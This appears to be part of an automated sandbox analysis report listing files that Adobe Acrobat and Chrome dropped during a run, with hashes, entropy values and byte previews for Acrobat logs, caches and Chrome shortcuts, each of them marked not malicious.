                                                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):246
                                                                                                    Entropy (8bit):3.5209238895127717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84sClE3ElQtBw:Qw946cPbiOxDlbYnuRKID3Rti
                                                                                                    MD5:FE7934EAE9F98621E299F56A465732A2
                                                                                                    SHA1:50B197E0FD6400CEC0BCB7B38544F68432F10C29
                                                                                                    SHA-256:1BF4900227CE14787538D19F4DBBD817BB950A15874707DE0999BBA8D974237F
                                                                                                    SHA-512:36E7D4DDCC8A3DFFB54B610B2419CFDD757449C28D4D028F0CD2423C8FA94647C3BD658B6754DAD424F8952C569414995B7F1DEF50D581D9639C3D87D25D7EE7
                                                                                                    Malicious:false
                                                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.0.1./.2.0.2.5. . .1.2.:.3.5.:.2.9. .=.=.=.....
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PDF document, version 1.6, 0 pages
                                                                                                    Category:dropped
                                                                                                    Size (bytes):358
                                                                                                    Entropy (8bit):4.982817364632808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOLPATXhOPAfTCSyAAO:IngVMre9T0HQIDmy9g06JX7PAbYPArlX
                                                                                                    MD5:44C4B1A66C360C4E5CB28496625781FF
                                                                                                    SHA1:811941AAB7AD5B61F9966EA00ABD2D3FF11BC825
                                                                                                    SHA-256:A631BFCC7A57F40A2D1F4BF5A6612B9A54DCEAADE9C1A787BC6CD5DFDF6A9CD1
                                                                                                    SHA-512:D1A824BDF1372CFDAF1417182869471C922B3871AA322BCFD447C3FB57F30FE2F5098C3CFCCD663213FE087DA98759D0B6C38D731D140CA7B854282397921960
                                                                                                    Malicious:false
                                                                                                    Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<2DFA3272F403EC4CAEA182B00203D07A><2DFA3272F403EC4CAEA182B00203D07A>]>>..startxref..127..%%EOF..
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:ASCII text, with very long lines (393)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16525
                                                                                                    Entropy (8bit):5.376360055978702
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                    MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                    SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                    SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                    SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                    Malicious:false
                                                                                                    Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:ASCII text, with very long lines (392), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15090
                                                                                                    Entropy (8bit):5.380498776039874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:pSGHGGbEGM/PjptGLsL4iJjCRWx03IAOzU6uvXnOsrQtHgmxnWYhXCXGbxv+0dNM:MdQ
                                                                                                    MD5:AC9E2325A61AB1540AB5AAB7F330073E
                                                                                                    SHA1:FB7434AB6C046B367A5D35E1DB2498338044267A
                                                                                                    SHA-256:EAF30D401B32274BBAFCA1666579F0879DDB941E359D2F7BF09646D20EFB141B
                                                                                                    SHA-512:6490F87EC5C5B2789A441F2BBEFB4C45BF08603B4A6D5677E860E074226AC2E17B4DF7B7A3B027DF7C5ECA69EB880CBAB9E763C7ADA19D50A73E25E8DC9D7F06
                                                                                                    Malicious:false
                                                                                                    Preview:SessionID=614a6c93-a3d0-4559-948b-9d8c80496af5.1736876123382 Timestamp=2025-01-14T12:35:23:382-0500 ThreadID=6540 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=614a6c93-a3d0-4559-948b-9d8c80496af5.1736876123382 Timestamp=2025-01-14T12:35:23:383-0500 ThreadID=6540 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=614a6c93-a3d0-4559-948b-9d8c80496af5.1736876123382 Timestamp=2025-01-14T12:35:23:383-0500 ThreadID=6540 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=614a6c93-a3d0-4559-948b-9d8c80496af5.1736876123382 Timestamp=2025-01-14T12:35:23:383-0500 ThreadID=6540 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=614a6c93-a3d0-4559-948b-9d8c80496af5.1736876123382 Timestamp=2025-01-14T12:35:23:383-0500 ThreadID=6540 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29752
                                                                                                    Entropy (8bit):5.395449722091195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb4:Y/9b
                                                                                                    MD5:47BA407AD81F5CBA1F28C80C1CF41F3F
                                                                                                    SHA1:BC34B1C4B19E38AE69286EE738179DE68E0683F7
                                                                                                    SHA-256:4837D25C25EAE55D499FEE827F0A6F5AFBB4202488809A809070CBF752E85248
                                                                                                    SHA-512:A0A96A66CFC3963399AFEC095F3AEF1238A211BC0F33A56D0DD1F87EBD731672167708B1C1BB201DF633E58F23239C64780BC8D1940BDA9B26E84E1E1C28CC05
                                                                                                    Malicious:false
                                                                                                    Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                    Category:dropped
                                                                                                    Size (bytes):386528
                                                                                                    Entropy (8bit):7.9736851559892425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                    Malicious:false
                                                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1419751
                                                                                                    Entropy (8bit):7.976496077007677
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:/nZwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG/WLxYGZN3mlind9i4ufFXpAXkru
                                                                                                    MD5:1F3D69524A9D7E17BD2363C81D130F1A
                                                                                                    SHA1:C2A4A08839CBA47BEE2B601975F7C4F0CC191091
                                                                                                    SHA-256:D0FFBEC8502A0BE88A99F6708987658FEBE4CF3B6B79AF219C53EFF6458F9D9D
                                                                                                    SHA-512:A4CBE7073A7CB4C5E33E1CD903CCD7F24B78A04C037BFA1D90D9A5BBD12AF60E3DFFD6546277D1B765CA1DAC1CDA28D24D3454C81952B72D97CAF84DF395E99A
                                                                                                    Malicious:false
                                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758601
                                                                                                    Entropy (8bit):7.98639316555857
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                    MD5:3A49135134665364308390AC398006F1
                                                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                    Malicious:false
                                                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1407294
                                                                                                    Entropy (8bit):7.97605879016224
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48
                                                                                                    MD5:1D64D25345DD73F100517644279994E6
                                                                                                    SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                                                                                                    SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                                                                                                    SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                                                                                                    Malicious:false
                                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:35:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2677
                                                                                                    Entropy (8bit):3.975096834346754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:8jSdWTSSizH3idAKZdA19ehwiZUklqehGy+3:8jjTiNdy
                                                                                                    MD5:9C072719861CA5A7A4B49EDC87DF2EB0
                                                                                                    SHA1:6FA0B7F4821C53FB0312DB095F1D66AD0828E590
                                                                                                    SHA-256:058BE3A26CAC77CB80B4CBF723A137931172744463D7D0C34D6BF2357AB3710C
                                                                                                    SHA-512:14609B46746E469D5668B1760A517722E9201FF2710CBB8B25DB79EEEEB22D50E9CC12A42E9F33DF4BA4F4C949E4820F26B120A18A5D50C0B00245DA3A670158
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.@.. ...$+.,....="...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Zj.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Zw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Zw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Zw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Zy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:35:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2679
                                                                                                    Entropy (8bit):3.9911710855177605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:8GdWTSSizH3idAKZdA1weh/iZUkAQkqehNy+2:8vTin9QQy
                                                                                                    MD5:45C49BFA400F1DD5E7998C4280774011
                                                                                                    SHA1:BA2AC98B0B4451EFEB3AA9014EEACBFB71F57688
                                                                                                    SHA-256:41242BDDA7C69A2EEEE7FC2C4FBE2EEB37F364AAB530A46DD93033B9B853E6BF
                                                                                                    SHA-512:696EB119D494750354CAF7A5DB8C3ECE971633AFC7A6BE37D206C99DB25B37A57B4DD59336BEA829B77F46F476C45485D8DEE79756A53374CEC952ABC062EC8A
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.@.. ...$+.,....M....f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Zj.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Zw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Zw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Zw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Zy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2693
                                                                                                    Entropy (8bit):4.003520562817565
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:8x+dWTSSsH3idAKZdA14tseh7sFiZUkmgqeh7sHy+BX:8xHTqnxy
                                                                                                    MD5:CA95EDFB28FE78AB951ECCCAAF737D36
                                                                                                    SHA1:15C457A22BEFDFDA0C993506697A027A9A3A43BA
                                                                                                    SHA-256:7CB10E93466E45CB967C90AAB51E249968C1D9BDCA53EA57682C4E7B02282702
                                                                                                    SHA-512:A29B303ABC5FE29974045AAA521D99C6EE3F1141684B69DBC7261ADC2B35EFFBE420722341D766FAAC916215421BEA22587FD629CDE8F5BC98415300E006C8DB
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Zj.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Zw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Zw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Zw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:35:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2681
                                                                                                    Entropy (8bit):3.9907429037306565
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:8vdWTSSizH3idAKZdA1vehDiZUkwqehJy+R:8kTiEfy
                                                                                                    MD5:4C932706226B78200A727DC4222CD8EE
                                                                                                    SHA1:B22789B04E3D6708CFB87C1B96FCB878944FA8EF
                                                                                                    SHA-256:51F82C5B1271C10C7167C064BDB7D4B4877D8A2E02315DAF126559A97DBE37B5
                                                                                                    SHA-512:EA2EC04278BAFDA1AFD5F0B0B9B44A617C90DFB37DCCE09FF0D18D7DEA793CF17DD24A92C335139A8A6A46EF13F3C8BFF238E10EF02C68729767A75F2F2F9D50
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.@.. ...$+.,.....z...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Zj.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Zw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Zw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Zw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Zy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:35:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2681
                                                                                                    Entropy (8bit):3.978418782537253
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:8gSdWTSSizH3idAKZdA1hehBiZUk1W1qehLy+C:8gjTiE9ry
                                                                                                    MD5:6463C15467410160DB9FF73721CDB82E
                                                                                                    SHA1:8A8D6D48F85BBCFF0002603C347349247A347BE0
                                                                                                    SHA-256:7553EED6483BF7E876160BB7C82A3558D69DA783925CEBFA61A3C2ED6A992827
